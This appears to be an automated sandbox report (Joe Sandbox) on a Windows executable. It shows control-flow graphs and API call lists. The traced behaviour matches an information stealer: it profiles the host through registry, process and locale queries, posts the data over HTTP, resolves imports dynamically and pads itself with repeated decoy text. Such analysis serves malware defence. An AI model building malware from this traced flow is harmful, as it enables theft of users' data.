14774->14775 14776 685a1d 14775->14776 14777 685fc3 InternetCloseHandle 14776->14777 14778 698b60 3 API calls 14776->14778 14779 685fe0 14777->14779 14780 685a3c 14778->14780 14782 689ac0 4 API calls 14779->14782 14781 69a920 3 API calls 14780->14781 14784 685a4f 14781->14784 14783 685fe6 14782->14783 14786 69a820 2 API calls 14783->14786 14789 68601f ctype 14783->14789 14785 69a8a0 lstrcpy 14784->14785 14790 685a58 14785->14790 14787 685ffd 14786->14787 14788 69a9b0 4 API calls 14787->14788 14791 686013 14788->14791 14793 69a7a0 lstrcpy 14789->14793 14794 69a9b0 4 API calls 14790->14794 14792 69a8a0 lstrcpy 14791->14792 14792->14789 14802 68604f 14793->14802 14795 685a82 14794->14795 14796 69a8a0 lstrcpy 14795->14796 14797 685a8b 14796->14797 14798 69a9b0 4 API calls 14797->14798 14799 685aaa 14798->14799 14800 69a8a0 lstrcpy 14799->14800 14801 685ab3 14800->14801 14803 69a920 3 API calls 14801->14803 14802->13674 14804 685ad1 14803->14804 14805 69a8a0 lstrcpy 14804->14805 14806 685ada 14805->14806 14807 69a9b0 4 API calls 14806->14807 14808 685af9 14807->14808 14809 69a8a0 lstrcpy 14808->14809 14810 685b02 14809->14810 14811 69a9b0 4 API calls 14810->14811 14812 685b21 14811->14812 14813 69a8a0 lstrcpy 14812->14813 14814 685b2a 14813->14814 14815 69a9b0 4 API calls 14814->14815 14816 685b56 14815->14816 14817 69a920 3 API calls 14816->14817 14818 685b5d 14817->14818 14819 69a8a0 lstrcpy 14818->14819 14820 685b66 14819->14820 14821 685b7c InternetConnectA 14820->14821 14821->14777 14822 685bac HttpOpenRequestA 14821->14822 14824 685c0b 14822->14824 14825 685fb6 InternetCloseHandle 14822->14825 14826 69a9b0 4 API calls 14824->14826 14825->14777 14827 685c1f 14826->14827 14828 69a8a0 lstrcpy 14827->14828 14829 685c28 14828->14829 14830 69a920 3 API calls 14829->14830 14831 685c46 14830->14831 14832 69a8a0 lstrcpy 14831->14832 14833 685c4f 14832->14833 14834 69a9b0 4 API calls 14833->14834 14835 685c6e 14834->14835 14836 69a8a0 lstrcpy 14835->14836 14837 685c77 
14836->14837 14838 69a9b0 4 API calls 14837->14838 14839 685c98 14838->14839 14840 69a8a0 lstrcpy 14839->14840 14841 685ca1 14840->14841 14842 69a9b0 4 API calls 14841->14842 14843 685cc1 14842->14843 14844 69a8a0 lstrcpy 14843->14844 14845 685cca 14844->14845 14846 69a9b0 4 API calls 14845->14846 14847 685ce9 14846->14847 14848 69a8a0 lstrcpy 14847->14848 14849 685cf2 14848->14849 14850 69a920 3 API calls 14849->14850 14851 685d10 14850->14851 14852 69a8a0 lstrcpy 14851->14852 14853 685d19 14852->14853 14854 69a9b0 4 API calls 14853->14854 14855 685d38 14854->14855 14856 69a8a0 lstrcpy 14855->14856 14857 685d41 14856->14857 14858 69a9b0 4 API calls 14857->14858 14859 685d60 14858->14859 14860 69a8a0 lstrcpy 14859->14860 14861 685d69 14860->14861 14862 69a920 3 API calls 14861->14862 14863 685d87 14862->14863 14864 69a8a0 lstrcpy 14863->14864 14865 685d90 14864->14865 14866 69a9b0 4 API calls 14865->14866 14867 685daf 14866->14867 14868 69a8a0 lstrcpy 14867->14868 14869 685db8 14868->14869 14870 69a9b0 4 API calls 14869->14870 14871 685dd9 14870->14871 14872 69a8a0 lstrcpy 14871->14872 14873 685de2 14872->14873 14874 69a9b0 4 API calls 14873->14874 14875 685e02 14874->14875 14876 69a8a0 lstrcpy 14875->14876 14877 685e0b 14876->14877 14878 69a9b0 4 API calls 14877->14878 14879 685e2a 14878->14879 14880 69a8a0 lstrcpy 14879->14880 14881 685e33 14880->14881 14882 69a920 3 API calls 14881->14882 14883 685e54 14882->14883 14884 69a8a0 lstrcpy 14883->14884 14885 685e5d 14884->14885 14886 685e70 lstrlen 14885->14886 15682 69aad0 14886->15682 14888 685e81 lstrlen GetProcessHeap RtlAllocateHeap 15683 69aad0 14888->15683 14890 685eae lstrlen 14891 685ebe 14890->14891 14892 685ed7 lstrlen 14891->14892 14893 685ee7 14892->14893 14894 685ef0 lstrlen 14893->14894 14895 685f04 14894->14895 14896 685f1a lstrlen 14895->14896 15684 69aad0 14896->15684 14898 685f2a HttpSendRequestA 14899 685f35 InternetReadFile 14898->14899 14900 685f6a InternetCloseHandle 14899->14900 14904 685f61 
14899->14904 14900->14825 14902 69a9b0 4 API calls 14902->14904 14903 69a8a0 lstrcpy 14903->14904 14904->14899 14904->14900 14904->14902 14904->14903 14907 691077 14905->14907 14906 691151 14906->13676 14907->14906 14908 69a820 lstrlen lstrcpy 14907->14908 14908->14907 14910 690db7 14909->14910 14911 690ea4 StrCmpCA 14910->14911 14912 690e27 StrCmpCA 14910->14912 14913 690e67 StrCmpCA 14910->14913 14914 690f17 14910->14914 14915 69a820 lstrlen lstrcpy 14910->14915 14911->14910 14912->14910 14913->14910 14914->13684 14915->14910 14919 690f67 14916->14919 14917 691044 14917->13692 14918 690fb2 StrCmpCA 14918->14919 14919->14917 14919->14918 14920 69a820 lstrlen lstrcpy 14919->14920 14920->14919 14922 69a740 lstrcpy 14921->14922 14923 691a26 14922->14923 14924 69a9b0 4 API calls 14923->14924 14925 691a37 14924->14925 14926 69a8a0 lstrcpy 14925->14926 14927 691a40 14926->14927 14928 69a9b0 4 API calls 14927->14928 14929 691a5b 14928->14929 14930 69a8a0 lstrcpy 14929->14930 14931 691a64 14930->14931 14932 69a9b0 4 API calls 14931->14932 14933 691a7d 14932->14933 14934 69a8a0 lstrcpy 14933->14934 14935 691a86 14934->14935 14936 69a9b0 4 API calls 14935->14936 14937 691aa1 14936->14937 14938 69a8a0 lstrcpy 14937->14938 14939 691aaa 14938->14939 14940 69a9b0 4 API calls 14939->14940 14941 691ac3 14940->14941 14942 69a8a0 lstrcpy 14941->14942 14943 691acc 14942->14943 14944 69a9b0 4 API calls 14943->14944 14945 691ae7 14944->14945 14946 69a8a0 lstrcpy 14945->14946 14947 691af0 14946->14947 14948 69a9b0 4 API calls 14947->14948 14949 691b09 14948->14949 14950 69a8a0 lstrcpy 14949->14950 14951 691b12 14950->14951 14952 69a9b0 4 API calls 14951->14952 14953 691b2d 14952->14953 14954 69a8a0 lstrcpy 14953->14954 14955 691b36 14954->14955 14956 69a9b0 4 API calls 14955->14956 14957 691b4f 14956->14957 14958 69a8a0 lstrcpy 14957->14958 14959 691b58 14958->14959 14960 69a9b0 4 API calls 14959->14960 14961 691b76 14960->14961 14962 69a8a0 lstrcpy 14961->14962 14963 691b7f 
14962->14963 14964 697500 6 API calls 14963->14964 14965 691b96 14964->14965 14966 69a920 3 API calls 14965->14966 14967 691ba9 14966->14967 14968 69a8a0 lstrcpy 14967->14968 14969 691bb2 14968->14969 14970 69a9b0 4 API calls 14969->14970 14971 691bdc 14970->14971 14972 69a8a0 lstrcpy 14971->14972 14973 691be5 14972->14973 14974 69a9b0 4 API calls 14973->14974 14975 691c05 14974->14975 14976 69a8a0 lstrcpy 14975->14976 14977 691c0e 14976->14977 15685 697690 GetProcessHeap RtlAllocateHeap 14977->15685 14980 69a9b0 4 API calls 14981 691c2e 14980->14981 14982 69a8a0 lstrcpy 14981->14982 14983 691c37 14982->14983 14984 69a9b0 4 API calls 14983->14984 14985 691c56 14984->14985 14986 69a8a0 lstrcpy 14985->14986 14987 691c5f 14986->14987 14988 69a9b0 4 API calls 14987->14988 14989 691c80 14988->14989 14990 69a8a0 lstrcpy 14989->14990 14991 691c89 14990->14991 15692 6977c0 GetCurrentProcess IsWow64Process 14991->15692 14994 69a9b0 4 API calls 14995 691ca9 14994->14995 14996 69a8a0 lstrcpy 14995->14996 14997 691cb2 14996->14997 14998 69a9b0 4 API calls 14997->14998 14999 691cd1 14998->14999 15000 69a8a0 lstrcpy 14999->15000 15001 691cda 15000->15001 15002 69a9b0 4 API calls 15001->15002 15003 691cfb 15002->15003 15004 69a8a0 lstrcpy 15003->15004 15005 691d04 15004->15005 15006 697850 3 API calls 15005->15006 15007 691d14 15006->15007 15008 69a9b0 4 API calls 15007->15008 15009 691d24 15008->15009 15010 69a8a0 lstrcpy 15009->15010 15011 691d2d 15010->15011 15012 69a9b0 4 API calls 15011->15012 15013 691d4c 15012->15013 15014 69a8a0 lstrcpy 15013->15014 15015 691d55 15014->15015 15016 69a9b0 4 API calls 15015->15016 15017 691d75 15016->15017 15018 69a8a0 lstrcpy 15017->15018 15019 691d7e 15018->15019 15020 6978e0 3 API calls 15019->15020 15021 691d8e 15020->15021 15022 69a9b0 4 API calls 15021->15022 15023 691d9e 15022->15023 15024 69a8a0 lstrcpy 15023->15024 15025 691da7 15024->15025 15026 69a9b0 4 API calls 15025->15026 15027 691dc6 15026->15027 15028 69a8a0 lstrcpy 
15027->15028 15029 691dcf 15028->15029 15030 69a9b0 4 API calls 15029->15030 15031 691df0 15030->15031 15032 69a8a0 lstrcpy 15031->15032 15033 691df9 15032->15033 15694 697980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15033->15694 15036 69a9b0 4 API calls 15037 691e19 15036->15037 15038 69a8a0 lstrcpy 15037->15038 15039 691e22 15038->15039 15040 69a9b0 4 API calls 15039->15040 15041 691e41 15040->15041 15042 69a8a0 lstrcpy 15041->15042 15043 691e4a 15042->15043 15044 69a9b0 4 API calls 15043->15044 15045 691e6b 15044->15045 15046 69a8a0 lstrcpy 15045->15046 15047 691e74 15046->15047 15696 697a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15047->15696 15050 69a9b0 4 API calls 15051 691e94 15050->15051 15052 69a8a0 lstrcpy 15051->15052 15053 691e9d 15052->15053 15054 69a9b0 4 API calls 15053->15054 15055 691ebc 15054->15055 15056 69a8a0 lstrcpy 15055->15056 15057 691ec5 15056->15057 15058 69a9b0 4 API calls 15057->15058 15059 691ee5 15058->15059 15060 69a8a0 lstrcpy 15059->15060 15061 691eee 15060->15061 15699 697b00 GetUserDefaultLocaleName 15061->15699 15064 69a9b0 4 API calls 15065 691f0e 15064->15065 15066 69a8a0 lstrcpy 15065->15066 15067 691f17 15066->15067 15068 69a9b0 4 API calls 15067->15068 15069 691f36 15068->15069 15070 69a8a0 lstrcpy 15069->15070 15071 691f3f 15070->15071 15072 69a9b0 4 API calls 15071->15072 15073 691f60 15072->15073 15074 69a8a0 lstrcpy 15073->15074 15075 691f69 15074->15075 15703 697b90 15075->15703 15077 691f80 15078 69a920 3 API calls 15077->15078 15079 691f93 15078->15079 15080 69a8a0 lstrcpy 15079->15080 15081 691f9c 15080->15081 15082 69a9b0 4 API calls 15081->15082 15083 691fc6 15082->15083 15084 69a8a0 lstrcpy 15083->15084 15085 691fcf 15084->15085 15086 69a9b0 4 API calls 15085->15086 15087 691fef 15086->15087 15088 69a8a0 lstrcpy 15087->15088 15089 691ff8 15088->15089 15715 697d80 GetSystemPowerStatus 15089->15715 15092 69a9b0 4 API calls 15093 692018 15092->15093 15094 69a8a0 lstrcpy 15093->15094 15095 
692021 15094->15095 15096 69a9b0 4 API calls 15095->15096 15097 692040 15096->15097 15098 69a8a0 lstrcpy 15097->15098 15099 692049 15098->15099 15100 69a9b0 4 API calls 15099->15100 15101 69206a 15100->15101 15102 69a8a0 lstrcpy 15101->15102 15103 692073 15102->15103 15104 69207e GetCurrentProcessId 15103->15104 15717 699470 OpenProcess 15104->15717 15107 69a920 3 API calls 15108 6920a4 15107->15108 15109 69a8a0 lstrcpy 15108->15109 15110 6920ad 15109->15110 15111 69a9b0 4 API calls 15110->15111 15112 6920d7 15111->15112 15113 69a8a0 lstrcpy 15112->15113 15114 6920e0 15113->15114 15115 69a9b0 4 API calls 15114->15115 15116 692100 15115->15116 15117 69a8a0 lstrcpy 15116->15117 15118 692109 15117->15118 15722 697e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15118->15722 15121 69a9b0 4 API calls 15122 692129 15121->15122 15123 69a8a0 lstrcpy 15122->15123 15124 692132 15123->15124 15125 69a9b0 4 API calls 15124->15125 15126 692151 15125->15126 15127 69a8a0 lstrcpy 15126->15127 15128 69215a 15127->15128 15129 69a9b0 4 API calls 15128->15129 15130 69217b 15129->15130 15131 69a8a0 lstrcpy 15130->15131 15132 692184 15131->15132 15726 697f60 15132->15726 15135 69a9b0 4 API calls 15136 6921a4 15135->15136 15137 69a8a0 lstrcpy 15136->15137 15138 6921ad 15137->15138 15139 69a9b0 4 API calls 15138->15139 15140 6921cc 15139->15140 15141 69a8a0 lstrcpy 15140->15141 15142 6921d5 15141->15142 15143 69a9b0 4 API calls 15142->15143 15144 6921f6 15143->15144 15145 69a8a0 lstrcpy 15144->15145 15146 6921ff 15145->15146 15739 697ed0 GetSystemInfo wsprintfA 15146->15739 15149 69a9b0 4 API calls 15150 69221f 15149->15150 15151 69a8a0 lstrcpy 15150->15151 15152 692228 15151->15152 15153 69a9b0 4 API calls 15152->15153 15154 692247 15153->15154 15155 69a8a0 lstrcpy 15154->15155 15156 692250 15155->15156 15157 69a9b0 4 API calls 15156->15157 15158 692270 15157->15158 15159 69a8a0 lstrcpy 15158->15159 15160 692279 15159->15160 15741 698100 GetProcessHeap RtlAllocateHeap 15160->15741 15163 
69a9b0 4 API calls 15164 692299 15163->15164 15165 69a8a0 lstrcpy 15164->15165 15166 6922a2 15165->15166 15167 69a9b0 4 API calls 15166->15167 15168 6922c1 15167->15168 15169 69a8a0 lstrcpy 15168->15169 15170 6922ca 15169->15170 15171 69a9b0 4 API calls 15170->15171 15172 6922eb 15171->15172 15173 69a8a0 lstrcpy 15172->15173 15174 6922f4 15173->15174 15747 6987c0 15174->15747 15177 69a920 3 API calls 15178 69231e 15177->15178 15179 69a8a0 lstrcpy 15178->15179 15180 692327 15179->15180 15181 69a9b0 4 API calls 15180->15181 15182 692351 15181->15182 15183 69a8a0 lstrcpy 15182->15183 15184 69235a 15183->15184 15185 69a9b0 4 API calls 15184->15185 15186 69237a 15185->15186 15187 69a8a0 lstrcpy 15186->15187 15188 692383 15187->15188 15189 69a9b0 4 API calls 15188->15189 15190 6923a2 15189->15190 15191 69a8a0 lstrcpy 15190->15191 15192 6923ab 15191->15192 15752 6981f0 15192->15752 15194 6923c2 15195 69a920 3 API calls 15194->15195 15196 6923d5 15195->15196 15197 69a8a0 lstrcpy 15196->15197 15198 6923de 15197->15198 15199 69a9b0 4 API calls 15198->15199 15200 69240a 15199->15200 15201 69a8a0 lstrcpy 15200->15201 15202 692413 15201->15202 15203 69a9b0 4 API calls 15202->15203 15204 692432 15203->15204 15205 69a8a0 lstrcpy 15204->15205 15206 69243b 15205->15206 15207 69a9b0 4 API calls 15206->15207 15208 69245c 15207->15208 15209 69a8a0 lstrcpy 15208->15209 15210 692465 15209->15210 15211 69a9b0 4 API calls 15210->15211 15212 692484 15211->15212 15213 69a8a0 lstrcpy 15212->15213 15214 69248d 15213->15214 15215 69a9b0 4 API calls 15214->15215 15216 6924ae 15215->15216 15217 69a8a0 lstrcpy 15216->15217 15218 6924b7 15217->15218 15760 698320 15218->15760 15220 6924d3 15221 69a920 3 API calls 15220->15221 15222 6924e6 15221->15222 15223 69a8a0 lstrcpy 15222->15223 15224 6924ef 15223->15224 15225 69a9b0 4 API calls 15224->15225 15226 692519 15225->15226 15227 69a8a0 lstrcpy 15226->15227 15228 692522 15227->15228 15229 69a9b0 4 API calls 15228->15229 15230 692543 15229->15230 
15231 69a8a0 lstrcpy 15230->15231 15232 69254c 15231->15232 15233 698320 17 API calls 15232->15233 15234 692568 15233->15234 15235 69a920 3 API calls 15234->15235 15236 69257b 15235->15236 15237 69a8a0 lstrcpy 15236->15237 15238 692584 15237->15238 15239 69a9b0 4 API calls 15238->15239 15240 6925ae 15239->15240 15241 69a8a0 lstrcpy 15240->15241 15242 6925b7 15241->15242 15243 69a9b0 4 API calls 15242->15243 15244 6925d6 15243->15244 15245 69a8a0 lstrcpy 15244->15245 15246 6925df 15245->15246 15247 69a9b0 4 API calls 15246->15247 15248 692600 15247->15248 15249 69a8a0 lstrcpy 15248->15249 15250 692609 15249->15250 15796 698680 15250->15796 15252 692620 15253 69a920 3 API calls 15252->15253 15254 692633 15253->15254 15255 69a8a0 lstrcpy 15254->15255 15256 69263c 15255->15256 15257 69265a lstrlen 15256->15257 15258 69266a 15257->15258 15259 69a740 lstrcpy 15258->15259 15260 69267c 15259->15260 15261 681590 lstrcpy 15260->15261 15262 69268d 15261->15262 15806 695190 15262->15806 15264 692699 15264->13696 15994 69aad0 15265->15994 15267 685009 InternetOpenUrlA 15271 685021 15267->15271 15268 68502a InternetReadFile 15268->15271 15269 6850a0 InternetCloseHandle InternetCloseHandle 15270 6850ec 15269->15270 15270->13700 15271->15268 15271->15269 15995 6898d0 15272->15995 15274 690759 15275 690a38 15274->15275 15276 69077d 15274->15276 15277 681590 lstrcpy 15275->15277 15279 690799 StrCmpCA 15276->15279 15278 690a49 15277->15278 16171 690250 15278->16171 15281 690843 15279->15281 15282 6907a8 15279->15282 15285 690865 StrCmpCA 15281->15285 15284 69a7a0 lstrcpy 15282->15284 15286 6907c3 15284->15286 15287 690874 15285->15287 15324 69096b 15285->15324 15288 681590 lstrcpy 15286->15288 15289 69a740 lstrcpy 15287->15289 15290 69080c 15288->15290 15292 690881 15289->15292 15293 69a7a0 lstrcpy 15290->15293 15291 69099c StrCmpCA 15294 6909ab 15291->15294 15313 690a2d 15291->15313 15295 69a9b0 4 API calls 15292->15295 15296 690823 15293->15296 15298 681590 lstrcpy 15294->15298 
15299 6908ac 15295->15299 15297 69a7a0 lstrcpy 15296->15297 15300 69083e 15297->15300 15301 6909f4 15298->15301 15302 69a920 3 API calls 15299->15302 15998 68fb00 15300->15998 15304 69a7a0 lstrcpy 15301->15304 15305 6908b3 15302->15305 15306 690a0d 15304->15306 15307 69a9b0 4 API calls 15305->15307 15308 69a7a0 lstrcpy 15306->15308 15309 6908ba 15307->15309 15311 690a28 15308->15311 15310 69a8a0 lstrcpy 15309->15310 16114 690030 15311->16114 15313->13704 15324->15291 15646 69a7a0 lstrcpy 15645->15646 15647 681683 15646->15647 15648 69a7a0 lstrcpy 15647->15648 15649 681695 15648->15649 15650 69a7a0 lstrcpy 15649->15650 15651 6816a7 15650->15651 15652 69a7a0 lstrcpy 15651->15652 15653 6815a3 15652->15653 15653->14527 15655 6847c6 15654->15655 15656 684838 lstrlen 15655->15656 15680 69aad0 15656->15680 15658 684848 InternetCrackUrlA 15659 684867 15658->15659 15659->14604 15661 69a740 lstrcpy 15660->15661 15662 698b74 15661->15662 15663 69a740 lstrcpy 15662->15663 15664 698b82 GetSystemTime 15663->15664 15666 698b99 15664->15666 15665 69a7a0 lstrcpy 15667 698bfc 15665->15667 15666->15665 15667->14619 15669 69a931 15668->15669 15670 69a988 15669->15670 15672 69a968 lstrcpy lstrcat 15669->15672 15671 69a7a0 lstrcpy 15670->15671 15673 69a994 15671->15673 15672->15670 15673->14623 15674->14737 15676 689af9 LocalAlloc 15675->15676 15677 684eee 15675->15677 15676->15677 15678 689b14 CryptStringToBinaryA 15676->15678 15677->14625 15677->14628 15678->15677 15679 689b39 LocalFree 15678->15679 15679->15677 15680->15658 15681->14747 15682->14888 15683->14890 15684->14898 15813 6977a0 15685->15813 15688 691c1e 15688->14980 15689 6976c6 RegOpenKeyExA 15690 697704 RegCloseKey 15689->15690 15691 6976e7 RegQueryValueExA 15689->15691 15690->15688 15691->15690 15693 691c99 15692->15693 15693->14994 15695 691e09 15694->15695 15695->15036 15697 697a9a wsprintfA 15696->15697 15698 691e84 15696->15698 15697->15698 15698->15050 15700 697b4d 15699->15700 15701 691efe 15699->15701 15820 698d20 
[Control-flow graph edge list (node ids and call targets) continues here; the rendered graph is not recoverable from the text. APIs referenced by the listed nodes: LocalAlloc, CharToOemW, GetKeyboardLayoutList, GetLocaleInfoA, GetModuleFileNameExA, RegOpenKeyExA / RegEnumKeyExA / RegQueryValueExA / RegCloseKey, GetLogicalProcessorInformationEx, GlobalMemoryStatusEx, GetProcessHeap / RtlAllocateHeap / HeapFree, CreateToolhelp32Snapshot / Process32First / Process32Next, InternetOpenA / InternetConnectA / HttpOpenRequestA / InternetCloseHandle, CryptBinaryToStringA, VirtualAlloc / VirtualFree, LoadLibraryA / GetProcAddress / FreeLibrary, lstrcpy / lstrcat / lstrlen / wsprintfA.]

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph (function 699860-699bc2): resolves imports with GetProcAddress (21 calls) after call 699750 / call 699780, then LoadLibraryA (5 calls) followed by further GetProcAddress calls; edge list omitted, rendered graph not recoverable from text.
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01482398), ref: 006998A1
                              • GetProcAddress.KERNEL32(74DD0000,01482320), ref: 006998BA
                              • GetProcAddress.KERNEL32(74DD0000,014824E8), ref: 006998D2
                              • GetProcAddress.KERNEL32(74DD0000,01482440), ref: 006998EA
                              • GetProcAddress.KERNEL32(74DD0000,01482500), ref: 00699903
                              • GetProcAddress.KERNEL32(74DD0000,014890A8), ref: 0069991B
                              • GetProcAddress.KERNEL32(74DD0000,01475B90), ref: 00699933
                              • GetProcAddress.KERNEL32(74DD0000,01475AB0), ref: 0069994C
                              • GetProcAddress.KERNEL32(74DD0000,01482350), ref: 00699964
                              • GetProcAddress.KERNEL32(74DD0000,01482470), ref: 0069997C
                              • GetProcAddress.KERNEL32(74DD0000,01482488), ref: 00699995
                              • GetProcAddress.KERNEL32(74DD0000,014822D8), ref: 006999AD
                              • GetProcAddress.KERNEL32(74DD0000,01475DD0), ref: 006999C5
                              • GetProcAddress.KERNEL32(74DD0000,01482290), ref: 006999DE
                              • GetProcAddress.KERNEL32(74DD0000,01482218), ref: 006999F6
                              • GetProcAddress.KERNEL32(74DD0000,01475C50), ref: 00699A0E
                              • GetProcAddress.KERNEL32(74DD0000,01482230), ref: 00699A27
                              • GetProcAddress.KERNEL32(74DD0000,01482260), ref: 00699A3F
                              • GetProcAddress.KERNEL32(74DD0000,01475CD0), ref: 00699A57
                              • GetProcAddress.KERNEL32(74DD0000,01482308), ref: 00699A70
                              • GetProcAddress.KERNEL32(74DD0000,01475BB0), ref: 00699A88
                              • LoadLibraryA.KERNEL32(014822A8,?,00696A00), ref: 00699A9A
                              • LoadLibraryA.KERNEL32(014823F8,?,00696A00), ref: 00699AAB
                              • LoadLibraryA.KERNEL32(014822C0,?,00696A00), ref: 00699ABD
                              • LoadLibraryA.KERNEL32(01482278,?,00696A00), ref: 00699ACF
                              • LoadLibraryA.KERNEL32(01482338,?,00696A00), ref: 00699AE0
                              • GetProcAddress.KERNEL32(75A70000,01482380), ref: 00699B02
                              • GetProcAddress.KERNEL32(75290000,014823B0), ref: 00699B23
                              • GetProcAddress.KERNEL32(75290000,014823E0), ref: 00699B3B
                              • GetProcAddress.KERNEL32(75BD0000,01482410), ref: 00699B5D
                              • GetProcAddress.KERNEL32(75450000,01475D30), ref: 00699B7E
                              • GetProcAddress.KERNEL32(76E90000,01489088), ref: 00699B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00699BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00699BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: ad1bbda16a4376cdc115e08442a268f0bb3c439082a5461db7488de2ae3117ae
                              • Instruction ID: e90d11b9e75d8bcb3970622a30c118ad49fa7be448549b50bdb3eeca76e73b76
                              • Opcode Fuzzy Hash: ad1bbda16a4376cdc115e08442a268f0bb3c439082a5461db7488de2ae3117ae
                              • Instruction Fuzzy Hash: 9CA12CB550024C9FD34CEFA8FD88E663BF9F74C309B14852AA646C3264D7399852CB66

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph (function 6845c0-6847a9): RtlAllocateHeap, then a loop over block 6846ac-68474a, exiting through VirtualProtect in 68474f-6847a9; edge list omitted, rendered graph not recoverable from text.
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0068460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0068479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846D8
